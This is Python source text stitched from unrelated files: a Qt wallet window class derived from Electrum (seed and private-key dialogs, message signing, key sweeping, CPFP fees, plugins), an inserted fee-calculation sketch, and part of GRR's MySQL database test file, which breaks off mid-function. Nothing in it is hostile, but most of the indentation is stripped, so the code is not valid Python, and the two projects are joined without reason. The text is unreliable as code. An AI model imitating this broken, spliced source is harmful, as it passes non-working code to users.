ks_w = QWidget()
ks_vbox = QVBoxLayout()
ks_vbox.setContentsMargins(0, 0, 0, 0)
ks_w.setLayout(ks_vbox)
mpk_text = ShowQRTextEdit(ks.get_master_public_key(), config=self.config)
mpk_text.setMaximumHeight(150)
mpk_text.addCopyButton(self.app)
run_hook('show_xpub_button', mpk_text, ks)
der_path_hbox = QHBoxLayout()
der_path_hbox.setContentsMargins(0, 0, 0, 0)
der_path_hbox.addWidget(WWLabel(_("Derivation path") + ':'))
der_path_text = WWLabel(ks.get_derivation_prefix() or _("unknown"))
der_path_text.setTextInteractionFlags(Qt.TextSelectableByMouse)
der_path_hbox.addWidget(der_path_text)
der_path_hbox.addStretch()
ks_vbox.addWidget(WWLabel(_("Master Public Key")))
ks_vbox.addWidget(mpk_text)
ks_vbox.addLayout(der_path_hbox)
ks_stack.addWidget(ks_w)
select_ks(0)
vbox.addWidget(ks_stack)
vbox.addStretch(1)
btn_export_info = run_hook('wallet_info_buttons', self, dialog)
btn_close = CloseButton(dialog)
btns = Buttons(btn_export_info, btn_close)
vbox.addLayout(btns)
dialog.setLayout(vbox)
dialog.exec_()
def remove_wallet(self):
if self.question('\n'.join([
_('Delete wallet file?'),
"%s"%self.wallet.storage.path,
_('If your wallet contains funds, make sure you have saved its seed.')])):
self._delete_wallet()
@protected
def _delete_wallet(self, password):
wallet_path = self.wallet.storage.path
basename = os.path.basename(wallet_path)
r = self.gui_object.daemon.delete_wallet(wallet_path)
self.close()
if r:
self.show_error(_("Wallet removed: {}").format(basename))
else:
self.show_error(_("Wallet file not found: {}").format(basename))
@protected
def show_seed_dialog(self, password):
if not self.wallet.has_seed():
self.show_message(_('This wallet has no seed'))
return
keystore = self.wallet.get_keystore()
try:
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
except BaseException as e:
self.show_error(repr(e))
return
from .seed_dialog import SeedDialog
d = SeedDialog(self, seed, passphrase, config=self.config)
d.exec_()
def show_qrcode(self, data, title = _("QR code"), parent=None, *,
help_text=None, show_copy_text_btn=False):
if not data:
return
d = QRDialog(
data=data,
parent=parent or self,
title=title,
help_text=help_text,
show_copy_text_btn=show_copy_text_btn,
config=self.config,
)
d.exec_()
@protected
def show_private_key(self, address, password):
if not address:
return
try:
pk = self.wallet.export_private_key(address, password)
except Exception as e:
self.logger.exception('')
self.show_message(repr(e))
return
xtype = bitcoin.deserialize_privkey(pk)[0]
d = WindowModalDialog(self, _("Private key"))
d.setMinimumSize(600, 150)
vbox = QVBoxLayout()
vbox.addWidget(QLabel(_("Address") + ': ' + address))
vbox.addWidget(QLabel(_("Script type") + ': ' + xtype))
vbox.addWidget(QLabel(_("Private key") + ':'))
keys_e = ShowQRTextEdit(text=pk, config=self.config)
keys_e.addCopyButton(self.app)
vbox.addWidget(keys_e)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
d.exec_()
msg_sign = _("Signing with an address actually means signing with the corresponding "
"private key, and verifying with the corresponding public key. The "
"address you have entered does not have a unique public key, so these "
"operations cannot be performed.") + '\n\n' + \
_('The operation is undefined. Not just in Electrum, but in general.')
@protected
def do_sign(self, address, message, signature, password):
address = address.text().strip()
message = message.toPlainText().strip()
if not bitcoin.is_address(address):
self.show_message(_('Invalid Goldcoin address.'))
return
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
if not self.wallet.is_mine(address):
self.show_message(_('Address not in wallet.'))
return
txin_type = self.wallet.get_txin_type(address)
if txin_type not in ['p2pkh', 'p2wpkh', 'p2wpkh-p2sh']:
self.show_message(_('Cannot sign messages with this type of address:') + \
' ' + txin_type + '\n\n' + self.msg_sign)
return
task = partial(self.wallet.sign_message, address, message, password)
def show_signed_message(sig):
try:
signature.setText(base64.b64encode(sig).decode('ascii'))
except RuntimeError:
# (signature) wrapped C/C++ object has been deleted
pass
self.wallet.thread.add(task, on_success=show_signed_message)
def do_verify(self, address, message, signature):
address = address.text().strip()
message = message.toPlainText().strip().encode('utf-8')
if not bitcoin.is_address(address):
self.show_message(_('Invalid Goldcoin address.'))
return
try:
# This can throw on invalid base64
sig = base64.b64decode(str(signature.toPlainText()))
verified = ecc.verify_message_with_address(address, sig, message)
except Exception as e:
verified = False
if verified:
self.show_message(_("Signature verified"))
else:
self.show_error(_("Wrong signature"))
def sign_verify_message(self, address=''):
d = WindowModalDialog(self, _('Sign/verify Message'))
d.setMinimumSize(610, 290)
layout = QGridLayout(d)
message_e = QTextEdit()
message_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
address_e = QLineEdit()
address_e.setText(address)
layout.addWidget(QLabel(_('Address')), 2, 0)
layout.addWidget(address_e, 2, 1)
signature_e = QTextEdit()
signature_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Signature')), 3, 0)
layout.addWidget(signature_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Sign"))
b.clicked.connect(lambda: self.do_sign(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Verify"))
b.clicked.connect(lambda: self.do_verify(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
@protected
def do_decrypt(self, message_e, pubkey_e, encrypted_e, password):
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
cyphertext = encrypted_e.toPlainText()
task = partial(self.wallet.decrypt_message, pubkey_e.text(), cyphertext, password)
def setText(text):
try:
message_e.setText(text.decode('utf-8'))
except RuntimeError:
# (message_e) wrapped C/C++ object has been deleted
pass
self.wallet.thread.add(task, on_success=setText)
def do_encrypt(self, message_e, pubkey_e, encrypted_e):
message = message_e.toPlainText()
message = message.encode('utf-8')
try:
public_key = ecc.ECPubkey(bfh(pubkey_e.text()))
except BaseException as e:
self.logger.exception('Invalid Public key')
self.show_warning(_('Invalid Public key'))
return
encrypted = public_key.encrypt_message(message)
encrypted_e.setText(encrypted.decode('ascii'))
def encrypt_message(self, address=''):
d = WindowModalDialog(self, _('Encrypt/decrypt Message'))
d.setMinimumSize(610, 490)
layout = QGridLayout(d)
message_e = QTextEdit()
message_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
pubkey_e = QLineEdit()
if address:
pubkey = self.wallet.get_public_key(address)
pubkey_e.setText(pubkey)
layout.addWidget(QLabel(_('Public key')), 2, 0)
layout.addWidget(pubkey_e, 2, 1)
encrypted_e = QTextEdit()
encrypted_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Encrypted')), 3, 0)
layout.addWidget(encrypted_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Encrypt"))
b.clicked.connect(lambda: self.do_encrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Decrypt"))
b.clicked.connect(lambda: self.do_decrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
def password_dialog(self, msg=None, parent=None):
from .password_dialog import PasswordDialog
parent = parent or self
d = PasswordDialog(parent, msg)
return d.run()
def tx_from_text(self, data: Union[str, bytes]) -> Union[None, 'PartialTransaction', 'Transaction']:
from electrum.transaction import tx_from_any
try:
return tx_from_any(data)
except BaseException as e:
self.show_critical(_("Electrum was unable to parse your transaction") + ":\n" + repr(e))
return
def import_channel_backup(self, encrypted: str):
if not self.question('Import channel backup?'):
return
try:
self.wallet.lnworker.import_channel_backup(encrypted)
except Exception as e:
self.show_error("failed to import backup" + '\n' + str(e))
return
def read_tx_from_qrcode(self):
def cb(success: bool, error: str, data):
if not success:
if error:
self.show_error(error)
return
if not data:
return
# if the user scanned a bitcoin URI
if data.lower().startswith(BITCOIN_BIP21_URI_SCHEME + ':'):
self.pay_to_URI(data)
return
if data.lower().startswith('channel_backup:'):
self.import_channel_backup(data)
return
# else if the user scanned an offline signed tx
tx = self.tx_from_text(data)
if not tx:
return
self.show_transaction(tx)
scan_qrcode(parent=self.top_level_window(), config=self.config, callback=cb)
def read_tx_from_file(self) -> Optional[Transaction]:
fileName = getOpenFileName(
parent=self,
title=_("Select your transaction file"),
filter=TRANSACTION_FILE_EXTENSION_FILTER_ANY,
config=self.config,
)
if not fileName:
return
try:
with open(fileName, "rb") as f:
file_content = f.read() # type: Union[str, bytes]
except (ValueError, IOError, os.error) as reason:
self.show_critical(_("Electrum was unable to open your transaction file") + "\n" + str(reason),
title=_("Unable to read file or no transaction found"))
return
return self.tx_from_text(file_content)
def do_process_from_text(self):
text = text_dialog(
parent=self,
title=_('Input raw transaction'),
header_layout=_("Transaction:"),
ok_label=_("Load transaction"),
config=self.config,
)
if not text:
return
tx = self.tx_from_text(text)
if tx:
self.show_transaction(tx)
def do_process_from_text_channel_backup(self):
text = text_dialog(
parent=self,
title=_('Input channel backup'),
header_layout=_("Channel Backup:"),
ok_label=_("Load backup"),
config=self.config,
)
if not text:
return
if text.startswith('channel_backup:'):
self.import_channel_backup(text)
def do_process_from_file(self):
tx = self.read_tx_from_file()
if tx:
self.show_transaction(tx)
def do_process_from_txid(self):
from electrum import transaction
txid, ok = QInputDialog.getText(self, _('Lookup transaction'), _('Transaction ID') + ':')
if ok and txid:
txid = str(txid).strip()
raw_tx = self._fetch_tx_from_network(txid)
if not raw_tx:
return
tx = transaction.Transaction(raw_tx)
self.show_transaction(tx)
def _fetch_tx_from_network(self, txid: str) -> Optional[str]:
if not self.network:
self.show_message(_("You are offline."))
return
try:
raw_tx = self.network.run_from_another_thread(
self.network.get_transaction(txid, timeout=10))
except UntrustedServerReturnedError as e:
self.logger.info(f"Error getting transaction from network: {repr(e)}")
self.show_message(_("Error getting transaction from network") + ":\n" + e.get_message_for_gui())
return
except Exception as e:
self.show_message(_("Error getting transaction from network") + ":\n" + repr(e))
return
return raw_tx
@protected
def export_privkeys_dialog(self, password):
if self.wallet.is_watching_only():
self.show_message(_("This is a watching-only wallet"))
return
if isinstance(self.wallet, Multisig_Wallet):
self.show_message(_('WARNING: This is a multi-signature wallet.') + '\n' +
_('It cannot be "backed up" by simply exporting these private keys.'))
d = WindowModalDialog(self, _('Private keys'))
d.setMinimumSize(980, 300)
vbox = QVBoxLayout(d)
msg = "%s\n%s\n%s" % (_("WARNING: ALL your private keys are secret."),
_("Exposing a single private key can compromise your entire wallet!"),
_("In particular, DO NOT use 'redeem private key' services proposed by third parties."))
vbox.addWidget(QLabel(msg))
e = QTextEdit()
e.setReadOnly(True)
vbox.addWidget(e)
defaultname = 'electrum-private-keys.csv'
select_msg = _('Select file to export your private keys to')
hbox, filename_e, csv_button = filename_field(self, self.config, defaultname, select_msg)
vbox.addLayout(hbox)
b = OkButton(d, _('Export'))
b.setEnabled(False)
vbox.addLayout(Buttons(CancelButton(d), b))
private_keys = {}
addresses = self.wallet.get_addresses()
done = False
cancelled = False
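        # Private keys are derived in a background thread, one address at a time,
        # emitting progress signals; the flags above let the dialog cancel the export.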
def privkeys_thread():
for addr in addresses:
time.sleep(0.1)
if done or cancelled:
break
privkey = self.wallet.export_private_key(addr, password)
private_keys[addr] = privkey
self.computing_privkeys_signal.emit()
if not cancelled:
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.emit()
def show_privkeys():
s = "\n".join(map(lambda x: x[0] + "\t"+ x[1], private_keys.items()))
e.setText(s)
b.setEnabled(True)
self.show_privkeys_signal.disconnect()
nonlocal done
done = True
def on_dialog_closed(*args):
nonlocal done
nonlocal cancelled
if not done:
cancelled = True
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.disconnect()
self.computing_privkeys_signal.connect(lambda: e.setText("Please wait... %d/%d"%(len(private_keys),len(addresses))))
self.show_privkeys_signal.connect(show_privkeys)
d.finished.connect(on_dialog_closed)
threading.Thread(target=privkeys_thread).start()
if not d.exec_():
done = True
return
filename = filename_e.text()
if not filename:
return
try:
self.do_export_privkeys(filename, private_keys, csv_button.isChecked())
except (IOError, os.error) as reason:
txt = "\n".join([
_("Electrum was unable to produce a private key-export."),
str(reason)
])
self.show_critical(txt, title=_("Unable to create csv"))
except Exception as e:
self.show_message(repr(e))
return
self.show_message(_("Private keys exported."))
def do_export_privkeys(self, fileName, pklist, is_csv):
with open(fileName, "w+") as f:
os.chmod(fileName, 0o600)
if is_csv:
                writer = csv.writer(f)
                writer.writerow(["address", "private_key"])
                for addr, pk in pklist.items():
                    writer.writerow(["%34s" % addr, pk])
else:
f.write(json.dumps(pklist, indent = 4))
def do_import_labels(self):
def on_import():
self.need_update.set()
import_meta_gui(self, _('labels'), self.wallet.import_labels, on_import)
def do_export_labels(self):
export_meta_gui(self, _('labels'), self.wallet.export_labels)
def import_invoices(self):
import_meta_gui(self, _('invoices'), self.wallet.import_invoices, self.invoice_list.update)
def export_invoices(self):
export_meta_gui(self, _('invoices'), self.wallet.export_invoices)
def import_requests(self):
import_meta_gui(self, _('requests'), self.wallet.import_requests, self.request_list.update)
def export_requests(self):
export_meta_gui(self, _('requests'), self.wallet.export_requests)
def import_contacts(self):
import_meta_gui(self, _('contacts'), self.contacts.import_file, self.contact_list.update)
def export_contacts(self):
export_meta_gui(self, _('contacts'), self.contacts.export_file)
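    # Sweep dialog: collects WIF private keys and a destination address, prepares the
    # sweep inputs on the network thread (sweep_preparations), then hands off to
    # pay_onchain_dialog with external_keypairs so the swept keys can sign.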
def sweep_key_dialog(self):
d = WindowModalDialog(self, title=_('Sweep private keys'))
d.setMinimumSize(600, 300)
vbox = QVBoxLayout(d)
hbox_top = QHBoxLayout()
hbox_top.addWidget(QLabel(_("Enter private keys:")))
hbox_top.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
vbox.addLayout(hbox_top)
keys_e = ScanQRTextEdit(allow_multi=True, config=self.config)
keys_e.setTabChangesFocus(True)
vbox.addWidget(keys_e)
addresses = self.wallet.get_unused_addresses()
if not addresses:
try:
addresses = self.wallet.get_receiving_addresses()
except AttributeError:
addresses = self.wallet.get_addresses()
h, address_e = address_field(addresses)
vbox.addLayout(h)
vbox.addStretch(1)
button = OkButton(d, _('Sweep'))
vbox.addLayout(Buttons(CancelButton(d), button))
button.setEnabled(False)
def get_address():
addr = str(address_e.text()).strip()
if bitcoin.is_address(addr):
return addr
def get_pk(*, raise_on_error=False):
text = str(keys_e.toPlainText())
return keystore.get_private_keys(text, raise_on_error=raise_on_error)
def on_edit():
valid_privkeys = False
try:
valid_privkeys = get_pk(raise_on_error=True) is not None
except Exception as e:
button.setToolTip(f'{_("Error")}: {repr(e)}')
else:
button.setToolTip('')
button.setEnabled(get_address() is not None and valid_privkeys)
on_address = lambda text: address_e.setStyleSheet((ColorScheme.DEFAULT if get_address() else ColorScheme.RED).as_stylesheet())
keys_e.textChanged.connect(on_edit)
address_e.textChanged.connect(on_edit)
address_e.textChanged.connect(on_address)
on_address(str(address_e.text()))
if not d.exec_():
return
# user pressed "sweep"
addr = get_address()
try:
self.wallet.check_address_for_corruption(addr)
except InternalAddressCorruption as e:
self.show_error(str(e))
raise
privkeys = get_pk()
def on_success(result):
coins, keypairs = result
outputs = [PartialTxOutput.from_address_and_value(addr, value='!')]
self.warn_if_watching_only()
self.pay_onchain_dialog(coins, outputs, external_keypairs=keypairs)
def on_failure(exc_info):
self.on_error(exc_info)
msg = _('Preparing sweep transaction...')
task = lambda: self.network.run_from_another_thread(
sweep_preparations(privkeys, self.network))
WaitingDialog(self, msg, task, on_success, on_failure)
def _do_import(self, title, header_layout, func):
text = text_dialog(
parent=self,
title=title,
header_layout=header_layout,
ok_label=_('Import'),
allow_multi=True,
config=self.config,
)
if not text:
return
keys = str(text).split()
good_inputs, bad_inputs = func(keys)
if good_inputs:
msg = '\n'.join(good_inputs[:10])
if len(good_inputs) > 10: msg += '\n...'
self.show_message(_("The following addresses were added")
+ f' ({len(good_inputs)}):\n' + msg)
if bad_inputs:
msg = "\n".join(f"{key[:10]}... ({msg})" for key, msg in bad_inputs[:10])
if len(bad_inputs) > 10: msg += '\n...'
self.show_error(_("The following inputs could not be imported")
+ f' ({len(bad_inputs)}):\n' + msg)
self.address_list.update()
self.history_list.update()
def import_addresses(self):
if not self.wallet.can_import_address():
return
title, msg = _('Import addresses'), _("Enter addresses")+':'
self._do_import(title, msg, self.wallet.import_addresses)
@protected
def do_import_privkey(self, password):
if not self.wallet.can_import_privkey():
return
title = _('Import private keys')
header_layout = QHBoxLayout()
header_layout.addWidget(QLabel(_("Enter private keys")+':'))
header_layout.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
self._do_import(title, header_layout, lambda x: self.wallet.import_private_keys(x, password))
def update_fiat(self):
b = self.fx and self.fx.is_enabled()
self.fiat_send_e.setVisible(b)
self.fiat_receive_e.setVisible(b)
self.history_list.update()
self.address_list.refresh_headers()
self.address_list.update()
self.update_status()
def settings_dialog(self):
from .settings_dialog import SettingsDialog
d = SettingsDialog(self, self.config)
self.alias_received_signal.connect(d.set_alias_color)
d.exec_()
self.alias_received_signal.disconnect(d.set_alias_color)
if self.fx:
self.fx.trigger_update()
run_hook('close_settings_dialog')
if d.need_restart:
self.show_warning(_('Please restart Electrum to activate the new GUI settings'), title=_('Success'))
def closeEvent(self, event):
# note that closeEvent is NOT called if the user quits with Ctrl-C
self.clean_up()
event.accept()
def clean_up(self):
if self._cleaned_up:
return
self._cleaned_up = True
if self.wallet.thread:
self.wallet.thread.stop()
self.wallet.thread = None
util.unregister_callback(self.on_network)
self.config.set_key("is_maximized", self.isMaximized())
if not self.isMaximized():
g = self.geometry()
self.wallet.db.put("winpos-qt", [g.left(),g.top(),
g.width(),g.height()])
self.wallet.db.put("qt-console-history", self.console.history[-50:])
if self.qr_window:
self.qr_window.close()
self.close_wallet()
if self._update_check_thread:
self._update_check_thread.exit()
self._update_check_thread.wait()
if self.tray:
self.tray = None
self.gui_object.timer.timeout.disconnect(self.timer_actions)
self.gui_object.close_window(self)
def plugins_dialog(self):
self.pluginsdialog = d = WindowModalDialog(self, _('Electrum Plugins'))
plugins = self.gui_object.plugins
vbox = QVBoxLayout(d)
# plugins
scroll = QScrollArea()
scroll.setEnabled(True)
scroll.setWidgetResizable(True)
scroll.setMinimumSize(400,250)
vbox.addWidget(scroll)
w = QWidget()
scroll.setWidget(w)
w.setMinimumHeight(plugins.count() * 35)
grid = QGridLayout()
grid.setColumnStretch(0,1)
w.setLayout(grid)
settings_widgets = {}
def enable_settings_widget(p: Optional['BasePlugin'], name: str, i: int):
widget = settings_widgets.get(name) # type: Optional[QWidget]
if widget and not p:
# plugin got disabled, rm widget
grid.removeWidget(widget)
widget.setParent(None)
settings_widgets.pop(name)
elif widget is None and p and p.requires_settings() and p.is_enabled():
# plugin got enabled, add widget
widget = settings_widgets[name] = p.settings_widget(d)
grid.addWidget(widget, i, 1)
def do_toggle(cb, name, i):
p = plugins.toggle(name)
cb.setChecked(bool(p))
enable_settings_widget(p, name, i)
# note: all enabled plugins will receive this hook:
run_hook('init_qt', self.gui_object)
for i, descr in enumerate(plugins.descriptions.values()):
full_name = descr['__name__']
prefix, _separator, name = full_name.rpartition('.')
p = plugins.get(name)
if descr.get('registers_keystore'):
continue
try:
cb = QCheckBox(descr['fullname'])
plugin_is_loaded = p is not None
cb_enabled = (not plugin_is_loaded and plugins.is_available(name, self.wallet)
or plugin_is_loaded and p.can_user_disable())
cb.setEnabled(cb_enabled)
cb.setChecked(plugin_is_loaded and p.is_enabled())
grid.addWidget(cb, i, 0)
enable_settings_widget(p, name, i)
cb.clicked.connect(partial(do_toggle, cb, name, i))
msg = descr['description']
if descr.get('requires'):
msg += '\n\n' + _('Requires') + ':\n' + '\n'.join(map(lambda x: x[1], descr.get('requires')))
grid.addWidget(HelpButton(msg), i, 2)
except Exception:
self.logger.exception(f"cannot display plugin {name}")
grid.setRowStretch(len(plugins.descriptions.values()), 1)
vbox.addLayout(Buttons(CloseButton(d)))
d.exec_()
def cpfp_dialog(self, parent_tx: Transaction) -> None:
new_tx = self.wallet.cpfp(parent_tx, 0)
total_size = parent_tx.estimated_size() + new_tx.estimated_size()
parent_txid = parent_tx.txid()
assert parent_txid
parent_fee = self.wallet.get_tx_fee(parent_txid)
if parent_fee is None:
self.show_error(_("Can't CPFP: unknown fee for parent transaction."))
return
d = WindowModalDialog(self, _('Child Pays for Parent'))
vbox = QVBoxLayout(d)
msg = _(
"A CPFP is a transaction that sends an unconfirmed output back to "
"yourself, with a high fee. The goal is to have miners confirm "
"the parent transaction in order to get the fee attached to the "
"child transaction.")
vbox.addWidget(WWLabel(msg))
msg2 = _("The proposed fee is computed using your "
"fee/kB settings, applied to the total size of both child and "
"parent transactions. After you broadcast a CPFP transaction, "
"it is normal to see a new unconfirmed transaction in your history.")
vbox.addWidget(WWLabel(msg2))
grid = QGridLayout()
grid.addWidget(QLabel(_('Total size') + ':'), 0, 0)
grid.addWidget(QLabel('%d bytes'% total_size), 0, 1)
max_fee = new_tx.output_value()
grid.addWidget(QLabel(_('Input amount') + ':'), 1, 0)
grid.addWidget(QLabel(self.format_amount(max_fee) + ' ' + self.base_unit()), 1, 1)
output_amount = QLabel('')
grid.addWidget(QLabel(_('Output amount') + ':'), 2, 0)
grid.addWidget(output_amount, 2, 1)
fee_e = BTCAmountEdit(self.get_decimal_point)
combined_fee = QLabel('')
combined_feerate = QLabel('')
def on_fee_edit(x):
fee_for_child = fee_e.get_amount()
if fee_for_child is None:
return
out_amt = max_fee - fee_for_child
out_amt_str = (self.format_amount(out_amt) + ' ' + self.base_unit()) if out_amt else ''
output_amount.setText(out_amt_str)
comb_fee = parent_fee + fee_for_child
comb_fee_str = (self.format_amount(comb_fee) + ' ' + self.base_unit()) if comb_fee else ''
combined_fee.setText(comb_fee_str)
comb_feerate = comb_fee / total_size * 1000
comb_feerate_str = self.format_fee_rate(comb_feerate) if comb_feerate else ''
combined_feerate.setText(comb_feerate_str)
fee_e.textChanged.connect(on_fee_edit)
def get_child_fee_from_total_feerate(fee_per_kb: Optional[int]) -> Optional[int]:
if fee_per_kb is None:
return None
fee = fee_per_kb * total_size / 1000 - parent_fee
fee = round(fee)
fee = min(max_fee, fee)
fee = max(total_size, fee) # pay at least 1 sat/byte for combined size
return fee
suggested_feerate = self.config.fee_per_kb()
fee = get_child_fee_from_total_feerate(suggested_feerate)
fee_e.setAmount(fee)
grid.addWidget(QLabel(_('Fee for child') + ':'), 3, 0)
grid.addWidget(fee_e, 3, 1)
def on_rate(dyn, pos, fee_rate):
fee = get_child_fee_from_total_feerate(fee_rate)
fee_e.setAmount(fee)
fee_slider = FeeSlider(self, self.config, on_rate)
fee_combo = FeeComboBox(fee_slider)
fee_slider.update()
grid.addWidget(fee_slider, 4, 1)
grid.addWidget(fee_combo, 4, 2)
grid.addWidget(QLabel(_('Total fee') + ':'), 5, 0)
grid.addWidget(combined_fee, 5, 1)
grid.addWidget(QLabel(_('Total feerate') + ':'), 6, 0)
grid.addWidget(combined_feerate, 6, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
fee = fee_e.get_amount()
if fee is None:
return # fee left empty, treat it as "cancel"
if fee > max_fee:
self.show_error(_('Max fee exceeded'))
return
try:
new_tx = self.wallet.cpfp(parent_tx, fee)
except CannotCPFP as e:
self.show_error(str(e))
return
self.show_transaction(new_tx)
def _add_info_to_tx_from_wallet_and_network(self, tx: PartialTransaction) -> bool:
"""Returns whether successful."""
# note side-effect: tx is being mutated
assert isinstance(tx, PartialTransaction)
try:
# note: this might download input utxos over network
BlockingWaitingDialog(
self,
_("Adding info to tx, from wallet and network..."),
lambda: tx.add_info_from_wallet(self.wallet, ignore_network_issues=False),
)
except NetworkException as e:
self.show_error(repr(e))
return False
return True
def bump_fee_dialog(self, tx: Transaction):
txid = tx.txid()
if not isinstance(tx, PartialTransaction):
tx = PartialTransaction.from_tx(tx)
if not self._add_info_to_tx_from_wallet_and_network(tx):
return
d = BumpFeeDialog(main_window=self, tx=tx, txid=txid)
d.run()
def dscancel_dialog(self, tx: Transaction):
txid = tx.txid()
if not isinstance(tx, PartialTransaction):
tx = PartialTransaction.from_tx(tx)
if not self._add_info_to_tx_from_wallet_and_network(tx):
return
d = DSCancelDialog(main_window=self, tx=tx, txid=txid)
d.run()
def save_transaction_into_wallet(self, tx: Transaction):
win = self.top_level_window()
try:
if not self.wallet.add_transaction(tx):
win.show_error(_("Transaction could not be saved.") + "\n" +
_("It conflicts with current history."))
return False
except AddTransactionException as e:
win.show_error(e)
return False
else:
self.wallet.save_db()
# need to update at least: history_list, utxo_list, address_list
self.need_update.set()
msg = (_("Transaction added to wallet history.") + '\n\n' +
_("Note: this is an offline transaction, if you want the network "
"to see it, you need to broadcast it."))
win.msg_box(QPixmap(icon_path("offline_tx.png")), None, _('Success'), msg)
return True
def show_cert_mismatch_error(self):
if self.showing_cert_mismatch_error:
return
self.showing_cert_mismatch_error = True
self.show_critical(title=_("Certificate mismatch"),
msg=_("The SSL certificate provided by the main server did not match the fingerprint passed in with the --serverfingerprint option.") + "\n\n" +
_("Electrum will now exit."))
self.showing_cert_mismatch_error = False
self.close()
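# Illustrative sketch (not part of Electrum): the child-fee arithmetic used by cpfp_dialog's
# get_child_fee_from_total_feerate above. Given a target combined feerate in sat/kB, the child
# pays the total fee for parent+child minus what the parent already paid, clamped to the value
# available in the child's output and to at least 1 sat/byte of the combined size.
def sketch_child_fee_from_total_feerate(fee_per_kb, total_size, parent_fee, max_fee):
    if fee_per_kb is None:
        return None
    fee = round(fee_per_kb * total_size / 1000 - parent_fee)
    fee = min(max_fee, fee)      # cannot exceed the value of the child's output
    fee = max(total_size, fee)   # pay at least 1 sat/byte for the combined size
    return fee
# Example: parent 200 vbytes paying 200 sats, child 150 vbytes, target 10000 sat/kB overall:
# sketch_child_fee_from_total_feerate(10000, 350, 200, max_fee=50000) -> 3300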
|
mysql_test.py
|
#!/usr/bin/env python
from __future__ import unicode_literals
import logging
import os
import random
import string
import threading
import unittest
from builtins import range # pylint: disable=redefined-builtin
import MySQLdb # TODO(hanuszczak): This should be imported conditionally.
from grr_response_server import db_test_mixin
from grr_response_server import db_utils
from grr_response_server.databases import mysql
from grr.test_lib import stats_test_lib
def _GetEnvironOrSkip(key):
value = os.environ.get(key)
if value is None:
raise unittest.SkipTest("'%s' variable is not set" % key)
return value
class TestMysqlDB(stats_test_lib.StatsTestMixin,
db_test_mixin.DatabaseTestMixin, unittest.TestCase):
"""Test the mysql.MysqlDB class.
Most of the tests in this suite are general blackbox tests of the db.Database
interface brought in by the db_test.DatabaseTestMixin.
"""
def CreateDatabase(self):
# pylint: disable=unreachable
user = _GetEnvironOrSkip("MYSQL_TEST_USER")
host = _GetEnvironOrSkip("MYSQL_TEST_HOST")
port = _GetEnvironOrSkip("MYSQL_TEST_PORT")
passwd = _GetEnvironOrSkip("MYSQL_TEST_PASS")
dbname = "".join(
random.choice(string.ascii_uppercase + string.digits)
for _ in range(10))
connection = MySQLdb.Connect(host=host, port=port, user=user, passwd=passwd)
cursor = connection.cursor()
cursor.execute("CREATE DATABASE " + dbname)
logging.info("Created test database: %s", dbname)
conn = mysql.MysqlDB(
host=host, port=port, user=user, passwd=passwd, db=dbname)
def Fin():
cursor.execute("DROP DATABASE " + dbname)
cursor.close()
connection.close()
conn.Close()
return conn, Fin
# pylint: enable=unreachable
def testIsRetryable(self):
self.assertFalse(mysql._IsRetryable(Exception("Some general error.")))
self.assertFalse(
mysql._IsRetryable(
MySQLdb.OperationalError(
1416, "Cannot get geometry object from data...")))
self.assertTrue(
mysql._IsRetryable(
MySQLdb.OperationalError(
1205, "Lock wait timeout exceeded; try restarting...")))
self.assertTrue(
mysql._IsRetryable(
MySQLdb.OperationalError(
1213,
"Deadlock found when trying to get lock; try restarting...")))
self.assertTrue(
mysql._IsRetryable(
MySQLdb.OperationalError(
1637, "Too many active concurrent transactions")))
def AddUser(self, connection, user, passwd):
cursor = connection.cursor()
cursor.execute("INSERT INTO grr_users (username, password) VALUES (%s, %s)",
(user, bytes(passwd)))
cursor.close()
def ListUsers(self, connection):
cursor = connection.cursor()
cursor.execute("SELECT username, password FROM grr_users")
ret = cursor.fetchall()
cursor.close()
return ret
def setUp(self):
super(TestMysqlDB, self).setUp()
db_utils.DBMetricsInit().RunOnce()
def testRunInTransaction(self):
self.db.delegate._RunInTransaction(
lambda con: self.AddUser(con, "AzureDiamond", "hunter2"))
users = self.db.delegate._RunInTransaction(self.ListUsers, readonly=True)
self.assertEqual(users, ((u"AzureDiamond", "hunter2"),))
def testRunInTransactionDeadlock(self):
"""A deadlock error should be retried."""
self.db.delegate._RunInTransaction(
lambda con: self.AddUser(con, "user1", "pw1"))
self.db.delegate._RunInTransaction(
lambda con: self.AddUser(con, "user2", "pw2"))
# We'll start two transactions which read/modify rows in different orders.
# This should force (at least) one to fail with a deadlock, which should be
# retried.
t1_halfway = threading.Event()
t2_halfway = threading.Event()
# Number of times each transaction is attempted.
counts = [0, 0]
def Transaction1(connection):
counts[0] += 1
cursor = connection.cursor()
cursor.execute(
"SELECT password FROM grr_users WHERE username = 'user1' FOR UPDATE;")
t1_halfway.set()
self.assertTrue(t2_halfway.wait(5))
cursor.execute("UPDATE grr_users SET password = 'pw2-updated' "
"WHERE username = 'user2';")
cursor.close()
def Transaction2(connection):
counts[1] += 1
cursor = connection.cursor()
cursor.execute(
